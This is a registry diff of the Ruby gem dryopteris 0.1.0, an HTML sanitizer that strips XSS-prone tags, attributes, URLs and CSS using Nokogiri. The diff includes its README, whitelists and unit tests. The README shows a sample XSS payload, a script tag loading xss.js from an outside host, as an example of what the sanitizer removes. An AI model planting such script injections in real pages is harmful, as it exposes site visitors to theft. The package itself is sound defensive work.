mdalessio-dryopteris 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
data/README.markdown ADDED
@@ -0,0 +1,77 @@
1
+ Dryopteris
2
+ ==========
3
+
4
+ Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
5
+
6
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
7
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
8
+
9
+ Usage
10
+ -----
11
+
12
+ Let's say you run a web site, and you allow people to post HTML snippets.
13
+
14
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
15
+
16
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
17
+
18
+ Oooh, that could be bad. Here's how to fix it:
19
+
20
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
21
+
22
+ Yeah, it's that easy.
23
+
24
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
25
+
26
+
27
+ More Usage
28
+ -----
29
+
30
+ You're still here? Ok, let me tell you a little something about the two different methods of sanitizing the Dryopteris offers.
31
+
32
+ ### Fragments
33
+
34
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
35
+
36
+ Usage is the same as above:
37
+
38
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
39
+
40
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
41
+
42
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either socket or file, check out the next section on __Documents__).
43
+
44
+ ### Documents
45
+
46
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
47
+
48
+ safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
49
+
50
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
51
+
52
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...). Which makes it particularly easy to sanitize large numbers of docs.
53
+
54
+
55
+ Standing on the Shoulders of Giants
56
+ -----
57
+
58
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
59
+
60
+ Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from [HTML5](http://code.google.com/p/html5lib/).
61
+
62
+
63
+ Authors
64
+ -----
65
+ * [Bryan Helmkamp](http://www.brynary.com/)
66
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
67
+
68
+
69
+ Quotes About Dryopteris
70
+ -----
71
+
72
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
73
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
74
+
75
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
76
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
77
+
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
1
+ ---
2
+ :major: 0
3
+ :minor: 0
4
+ :patch: 0
@@ -0,0 +1,46 @@
1
+ require "dryopteris"
2
+
3
+ module Dryopteris
4
+ module RailsExtension
5
+ def self.included(base)
6
+ base.extend(ClassMethods)
7
+
8
+ # sets up default of stripping tags for all fields
9
+ base.class_eval do
10
+ before_save :sanitize_fields
11
+ class_inheritable_reader :dryopteris_options
12
+ end
13
+ end
14
+
15
+ module ClassMethods
16
+ def sanitize_fields(options = {})
17
+ write_inheritable_attribute(:dryopteris_options, {
18
+ :except => (options[:except] || []),
19
+ :allow_tags => (options[:allow_tags] || [])
20
+ })
21
+ end
22
+
23
+ alias_method :sanitize_field, :sanitize_fields
24
+ end
25
+
26
+
27
+ def sanitize_fields
28
+ self.class.columns.each do |column|
29
+ next unless (column.type == :string || column.type == :text)
30
+
31
+ field = column.name.to_sym
32
+ value = self[field]
33
+
34
+ if dryopteris_options && dryopteris_options[:except].include?(field)
35
+ next
36
+ elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
37
+ self[field] = Dryopteris.sanitize(value)
38
+ else
39
+ self[field] = Dryopteris.strip_tags(value)
40
+ end
41
+ end
42
+
43
+ end
44
+
45
+ end
46
+ end
@@ -0,0 +1,135 @@
1
+ require 'rubygems'
2
+ gem 'nokogiri', '>=1.0.5'
3
+ require 'nokogiri'
4
+ require 'cgi'
5
+
6
+ require "dryopteris/whitelist"
7
+
8
+ module Dryopteris
9
+
10
+ class << self
11
+ def strip_tags(string_or_io, encoding=nil)
12
+ return nil if string_or_io.nil?
13
+ return "" if string_or_io.strip.size == 0
14
+
15
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
16
+ body_element = doc.at("/html/body")
17
+ return "" if body_element.nil?
18
+ body_element.inner_text
19
+ end
20
+
21
+ def sanitize(string, encoding=nil)
22
+ return nil if string.nil?
23
+ return "" if string.strip.size == 0
24
+
25
+ string = "<html><body>" + string + "</body></html>"
26
+ doc = Nokogiri::HTML.parse(string, nil, encoding)
27
+ body = doc.xpath("/html/body").first
28
+ return "" if body.nil?
29
+ body.children.each do |node|
30
+ traverse_conditionally_top_down(node, :sanitize_node)
31
+ end
32
+ body.children.map { |x| x.to_xml }.join
33
+ end
34
+
35
+ def sanitize_document(string_or_io, encoding=nil)
36
+ return nil if string_or_io.nil?
37
+ return "" if string_or_io.strip.size == 0
38
+
39
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
40
+ elements = doc.xpath("/html/head/*","/html/body/*")
41
+ return "" if (elements.nil? || elements.empty?)
42
+ elements.each do |node|
43
+ traverse_conditionally_top_down(node, :sanitize_node)
44
+ end
45
+ doc.root.to_xml
46
+ end
47
+
48
+ private
49
+ def traverse_conditionally_top_down(node, method_name)
50
+ return if send(method_name, node)
51
+ node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
52
+ end
53
+
54
+ def remove_tags_from_node(node)
55
+ replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
56
+ node.add_next_sibling(replacement_killer)
57
+ node.remove
58
+ return true
59
+ end
60
+
61
+ def sanitize_node(node)
62
+ case node.type
63
+ when 1 # Nokogiri::XML::Node::ELEMENT_NODE
64
+ if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
65
+ node.attributes.each do |attr|
66
+ node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
67
+ end
68
+ node.attributes.each do |attr|
69
+ if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
70
+ # this block lifted nearly verbatim from HTML5 sanitization
71
+ val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
72
+ if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
73
+ node.remove_attribute(attr.first)
74
+ end
75
+ end
76
+ end
77
+ if node.attributes['style']
78
+ node['style'] = sanitize_css(node.attributes['style'])
79
+ end
80
+ return false
81
+ end
82
+ when 3 # Nokogiri::XML::Node::TEXT_NODE
83
+ return false
84
+ when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
85
+ return false
86
+ end
87
+ replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
88
+ node.add_next_sibling(replacement_killer)
89
+ node.remove
90
+ return true
91
+ end
92
+
93
+
94
+ # this liftend nearly verbatim from html5
95
+ def sanitize_css(style)
96
+ # disallow urls
97
+ style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
98
+
99
+ # gauntlet
100
+ return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
101
+ return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
102
+
103
+ clean = []
104
+ style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
105
+ next if val.empty?
106
+ prop.downcase!
107
+ if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
108
+ clean << "#{prop}: #{val};"
109
+ elsif %w[background border margin padding].include?(prop.split('-')[0])
110
+ clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
111
+ HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
112
+ keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
113
+ end
114
+ elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
115
+ clean << "#{prop}: #{val};"
116
+ end
117
+ end
118
+
119
+ style = clean.join(' ')
120
+ end
121
+
122
+ end # self
123
+
124
+ module HashedWhiteList
125
+ # turn each of the whitelist arrays into a hash for faster lookup
126
+ WhiteList.constants.each do |constant|
127
+ next unless WhiteList.module_eval("#{constant}").is_a?(Array)
128
+ module_eval <<-CODE
129
+ #{constant} = {}
130
+ WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
131
+ CODE
132
+ end
133
+ end
134
+
135
+ end
@@ -0,0 +1,148 @@
1
+ #
2
+ # HTML whitelist lifted from HTML5 sanitizer code
3
+ # http://code.google.com/p/html5lib/
4
+ #
5
+
6
+ module Dryopteris
7
+ module WhiteList
8
+ # <html5_license>
9
+ #
10
+ # Copyright (c) 2006-2008 The Authors
11
+ #
12
+ # Contributors:
13
+ # James Graham - jg307@cam.ac.uk
14
+ # Anne van Kesteren - annevankesteren@gmail.com
15
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
16
+ # Matt McDonald - kanashii@kanashii.ca
17
+ # Sam Ruby - rubys@intertwingly.net
18
+ # Ian Hickson (Google) - ian@hixie.ch
19
+ # Thomas Broyer - t.broyer@ltgt.net
20
+ # Jacques Distler - distler@golem.ph.utexas.edu
21
+ # Henri Sivonen - hsivonen@iki.fi
22
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
23
+ #
24
+ # Permission is hereby granted, free of charge, to any person
25
+ # obtaining a copy of this software and associated documentation
26
+ # files (the "Software"), to deal in the Software without
27
+ # restriction, including without limitation the rights to use, copy,
28
+ # modify, merge, publish, distribute, sublicense, and/or sell copies
29
+ # of the Software, and to permit persons to whom the Software is
30
+ # furnished to do so, subject to the following conditions:
31
+ #
32
+ # The above copyright notice and this permission notice shall be
33
+ # included in all copies or substantial portions of the Software.
34
+ #
35
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
36
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
37
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
38
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
39
+ # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
40
+ # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
41
+ # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
42
+ # DEALINGS IN THE SOFTWARE.
43
+ #
44
+ # </html5_license>
45
+
46
+ ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
47
+ button caption center cite code col colgroup dd del dfn dir div dl dt
48
+ em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
49
+ legend li map menu ol optgroup option p pre q s samp select small span
50
+ strike strong sub sup table tbody td textarea tfoot th thead tr tt u
51
+ ul var]
52
+
53
+ MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
54
+ mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
55
+ msubsup msup mtable mtd mtext mtr munder munderover none]
56
+
57
+ SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
58
+ circle defs desc ellipse font-face font-face-name font-face-src g
59
+ glyph hkern image linearGradient line marker metadata missing-glyph
60
+ mpath path polygon polyline radialGradient rect set stop svg switch
61
+ text title tspan use]
62
+
63
+ ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
64
+ align alt axis border cellpadding cellspacing char charoff charset
65
+ checked cite class clear cols colspan color compact coords datetime
66
+ dir disabled enctype for frame headers height href hreflang hspace id
67
+ ismap label lang longdesc maxlength media method multiple name nohref
68
+ noshade nowrap prompt readonly rel rev rows rowspan rules scope
69
+ selected shape size span src start style summary tabindex target title
70
+ type usemap valign value vspace width xml:lang]
71
+
72
+ MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
73
+ columnalign columnlines columnspacing columnspan depth display
74
+ displaystyle equalcolumns equalrows fence fontstyle fontweight frame
75
+ height linethickness lspace mathbackground mathcolor mathvariant
76
+ mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
77
+ rowspacing rowspan rspace scriptlevel selection separator stretchy
78
+ width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
79
+
80
+ SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
81
+ arabic-form ascent attributeName attributeType baseProfile bbox begin
82
+ by calcMode cap-height class color color-rendering content cx cy d dx
83
+ dy descent display dur end fill fill-rule font-family font-size
84
+ font-stretch font-style font-variant font-weight from fx fy g1 g2
85
+ glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
86
+ ideographic k keyPoints keySplines keyTimes lang marker-end
87
+ marker-mid marker-start markerHeight markerUnits markerWidth
88
+ mathematical max min name offset opacity orient origin
89
+ overline-position overline-thickness panose-1 path pathLength points
90
+ preserveAspectRatio r refX refY repeatCount repeatDur
91
+ requiredExtensions requiredFeatures restart rotate rx ry slope stemh
92
+ stemv stop-color stop-opacity strikethrough-position
93
+ strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
94
+ stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
95
+ stroke-width systemLanguage target text-anchor to transform type u1
96
+ u2 underline-position underline-thickness unicode unicode-range
97
+ units-per-em values version viewBox visibility width widths x
98
+ x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
99
+ xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
100
+ xmlns:xlink y y1 y2 zoomAndPan]
101
+
102
+ ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
103
+
104
+ ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
105
+ border-bottom-color border-collapse border-color border-left-color
106
+ border-right-color border-top-color clear color cursor direction
107
+ display elevation float font font-family font-size font-style
108
+ font-variant font-weight height letter-spacing line-height overflow
109
+ pause pause-after pause-before pitch pitch-range richness speak
110
+ speak-header speak-numeral speak-punctuation speech-rate stress
111
+ text-align text-decoration text-indent unicode-bidi vertical-align
112
+ voice-family volume white-space width]
113
+
114
+ ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
115
+ brown center collapse dashed dotted fuchsia gray green !important
116
+ italic left lime maroon medium none navy normal nowrap olive pointer
117
+ purple red right solid silver teal top transparent underline white
118
+ yellow]
119
+
120
+ ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
121
+ stroke-width stroke-linecap stroke-linejoin stroke-opacity]
122
+
123
+ ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
124
+ telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
125
+
126
+ # subclasses may define their own versions of these constants
127
+ ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
128
+ ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
129
+ ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
130
+ ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
131
+ ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
132
+ ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
133
+
134
+ VOID_ELEMENTS = %w[
135
+ base
136
+ link
137
+ meta
138
+ hr
139
+ br
140
+ img
141
+ embed
142
+ param
143
+ area
144
+ col
145
+ input
146
+ ]
147
+ end
148
+ end
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,7 @@
1
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
2
+
3
+ require "dryopteris/sanitize"
4
+
5
+ module Dryopteris
6
+ VERSION = '0.1'
7
+ end
data/test/helper.rb ADDED
@@ -0,0 +1,2 @@
1
+ require 'test/unit'
2
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
@@ -0,0 +1,66 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestBasic < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.sanitize(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal "", Dryopteris.sanitize("")
11
+ end
12
+
13
+ def test_removal_of_illegal_tag
14
+ html = <<-HTML
15
+ following this there should be no jim tag
16
+ <jim>jim</jim>
17
+ was there?
18
+ HTML
19
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
20
+ assert sane.xpath("//jim").empty?
21
+ end
22
+
23
+ def test_removal_of_illegal_attribute
24
+ html = "<p class=bar foo=bar abbr=bar />"
25
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
26
+ node = sane.xpath("//p").first
27
+ assert node.attributes['class']
28
+ assert node.attributes['abbr']
29
+ assert_nil node.attributes['foo']
30
+ end
31
+
32
+ def test_removal_of_illegal_url_in_href
33
+ html = <<-HTML
34
+ <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
35
+ <a href='http://jim.jim/'>this link should be fine</a>
36
+ HTML
37
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
38
+ nodes = sane.xpath("//a")
39
+ assert_nil nodes.first.attributes['href']
40
+ assert nodes.last.attributes['href']
41
+ end
42
+
43
+ def test_css_sanitization
44
+ html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
45
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
46
+ assert_match(/#000/, sane.inner_html)
47
+ assert_no_match(/foo\.com/, sane.inner_html)
48
+ end
49
+
50
+ def test_fragment_with_no_tags
51
+ assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
52
+ end
53
+
54
+ def test_fragment_in_p_tag
55
+ assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
56
+ end
57
+
58
+ def test_fragment_in_a_nontrivial_p_tag
59
+ assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
60
+ end
61
+
62
+ def test_fragment_in_p_tag_plus_stuff
63
+ assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
64
+ end
65
+
66
+ end
@@ -0,0 +1,141 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class SanitizeTest < Test::Unit::TestCase
4
+ include Dryopteris
5
+
6
+ def sanitize_html stream
7
+ Dryopteris.sanitize(stream)
8
+ end
9
+
10
+ def sanitize_doc stream
11
+ Dryopteris.sanitize_document(stream)
12
+ end
13
+
14
+ def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
15
+ # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
16
+ assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
17
+
18
+ doc = sanitize_doc(input).gsub(/"/,"'")
19
+ assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
20
+ end
21
+
22
+ WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
23
+ define_method "test_should_allow_#{tag_name}_tag" do
24
+ input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
25
+ htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
26
+ xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
27
+ rexmloutput = xhtmloutput
28
+
29
+ ##
30
+ ## these special cases are HTML5-tokenizer-dependent.
31
+ ## libxml2 cleans up HTML differently, and I trust that.
32
+ ##
33
+ # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
34
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
35
+ # xhtmloutput = htmloutput
36
+ # elsif tag_name == 'col'
37
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
38
+ # xhtmloutput = htmloutput
39
+ # rexmloutput = "<col title='1' />"
40
+ # elsif tag_name == 'table'
41
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
42
+ # xhtmloutput = htmloutput
43
+ # elsif tag_name == 'image'
44
+ # htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
45
+ # xhtmloutput = htmloutput
46
+ # rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
47
+ if WhiteList::VOID_ELEMENTS.include?(tag_name)
48
+ if Nokogiri::LIBXML_VERSION <= "2.6.16"
49
+ htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
50
+ else
51
+ htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
52
+ end
53
+ xhtmloutput = htmloutput
54
+ # htmloutput += '<br/>' if tag_name == 'br'
55
+ rexmloutput = "<#{tag_name} title='1' />"
56
+ end
57
+ check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
58
+ end
59
+ end
60
+
61
+ ##
62
+ ## libxml2 downcases tag names as it parses, so this is unnecessary.
63
+ ##
64
+ # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
65
+ # define_method "test_should_forbid_#{tag_name.upcase}_tag" do
66
+ # input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
67
+ # output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
68
+ # check_sanitization(input, output, output, output)
69
+ # end
70
+ # end
71
+
72
+ WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
73
+ next if attribute_name == 'style'
74
+ next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
75
+ define_method "test_should_allow_#{attribute_name}_attribute" do
76
+ input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
77
+ output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
78
+ htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
79
+ check_sanitization(input, htmloutput, output, output)
80
+ end
81
+ end
82
+
83
+ ##
84
+ ## libxml2 downcases attributes as it parses, so this is unnecessary.
85
+ ##
86
+ # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
87
+ # define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
88
+ # input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
89
+ # output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
90
+ # check_sanitization(input, output, output, output)
91
+ # end
92
+ # end
93
+
94
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
95
+ define_method "test_should_allow_#{protocol}_uris" do
96
+ input = %(<a href="#{protocol}">foo</a>)
97
+ output = "<a href='#{protocol}'>foo</a>"
98
+ check_sanitization(input, output, output, output)
99
+ end
100
+ end
101
+
102
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
103
+ define_method "test_should_allow_uppercase_#{protocol}_uris" do
104
+ input = %(<a href="#{protocol.upcase}">foo</a>)
105
+ output = "<a href='#{protocol.upcase}'>foo</a>"
106
+ check_sanitization(input, output, output, output)
107
+ end
108
+ end
109
+
110
+ if Nokogiri::LIBXML_VERSION > '2.6.16'
111
+ def test_should_handle_astral_plane_characters
112
+ input = "<p>&#x1d4b5; &#x1d538;</p>"
113
+ output = "<p>\360\235\222\265 \360\235\224\270</p>"
114
+ check_sanitization(input, output, output, output)
115
+
116
+ input = "<p><tspan>\360\235\224\270</tspan> a</p>"
117
+ output = "<p><tspan>\360\235\224\270</tspan> a</p>"
118
+ check_sanitization(input, output, output, output)
119
+ end
120
+ end
121
+
122
+ # This affects only NS4. Is it worth fixing?
123
+ # def test_javascript_includes
124
+ # input = %(<div size="&{alert('XSS')}">foo</div>)
125
+ # output = "<div>foo</div>"
126
+ # check_sanitization(input, output, output, output)
127
+ # end
128
+
129
+ #html5_test_files('sanitizer').each do |filename|
130
+ # JSON::parse(open(filename).read).each do |test|
131
+ # define_method "test_#{test['name']}" do
132
+ # check_sanitization(
133
+ # test['input'],
134
+ # test['output'],
135
+ # test['xhtml'] || test['output'],
136
+ # test['rexml'] || test['output']
137
+ # )
138
+ # end
139
+ # end
140
+ #end
141
+ end
@@ -0,0 +1,35 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestStripTags < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.strip_tags(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal Dryopteris.strip_tags(""), ""
11
+ end
12
+
13
+ def test_return_empty_string_when_nothing_left
14
+ assert_equal "", Dryopteris.strip_tags('<script>test</script>')
15
+ end
16
+
17
+ def test_removal_of_all_tags
18
+ html = <<-HTML
19
+ What's up <strong>doc</strong>?
20
+ HTML
21
+ stripped = Dryopteris.strip_tags(html)
22
+ assert_equal "What's up doc?".strip, stripped.strip
23
+ end
24
+
25
+ def test_dont_remove_whitespace
26
+ html = "Foo\nBar"
27
+ assert_equal html, Dryopteris.strip_tags(html)
28
+ end
29
+
30
+ def test_dont_remove_whitespace_between_tags
31
+ html = "<p>Foo</p>\n<p>Bar</p>"
32
+ assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
33
+ end
34
+
35
+ end
metadata ADDED
@@ -0,0 +1,75 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: mdalessio-dryopteris
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - Bryan Helmkamp
8
+ - Mike Dalessio
9
+ autorequire:
10
+ bindir: bin
11
+ cert_chain: []
12
+
13
+ date: 2009-02-10 00:00:00 -08:00
14
+ default_executable:
15
+ dependencies:
16
+ - !ruby/object:Gem::Dependency
17
+ name: nokogiri
18
+ version_requirement:
19
+ version_requirements: !ruby/object:Gem::Requirement
20
+ requirements:
21
+ - - ">"
22
+ - !ruby/object:Gem::Version
23
+ version: 0.0.0
24
+ version:
25
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
26
+ email:
27
+ - bryan@brynary.com
28
+ - mike.dalessio@gmail.com
29
+ executables: []
30
+
31
+ extensions: []
32
+
33
+ extra_rdoc_files: []
34
+
35
+ files:
36
+ - README.markdown
37
+ - VERSION.yml
38
+ - lib/dryopteris
39
+ - lib/dryopteris/rails_extension.rb
40
+ - lib/dryopteris/sanitize.rb
41
+ - lib/dryopteris/whitelist.rb
42
+ - lib/dryopteris.rb
43
+ - test/test_basic.rb
44
+ - test/test_strip_tags.rb
45
+ - test/helper.rb
46
+ - test/test_sanitizer.rb
47
+ has_rdoc: true
48
+ homepage: http://github.com/brynary/dryopteris/tree/master
49
+ post_install_message:
50
+ rdoc_options:
51
+ - --inline-source
52
+ - --charset=UTF-8
53
+ require_paths:
54
+ - lib
55
+ required_ruby_version: !ruby/object:Gem::Requirement
56
+ requirements:
57
+ - - ">="
58
+ - !ruby/object:Gem::Version
59
+ version: "0"
60
+ version:
61
+ required_rubygems_version: !ruby/object:Gem::Requirement
62
+ requirements:
63
+ - - ">="
64
+ - !ruby/object:Gem::Version
65
+ version: "0"
66
+ version:
67
+ requirements: []
68
+
69
+ rubyforge_project:
70
+ rubygems_version: 1.2.0
71
+ signing_key:
72
+ specification_version: 2
73
+ summary: HTML sanitization using Nokogiri
74
+ test_files: []
75
+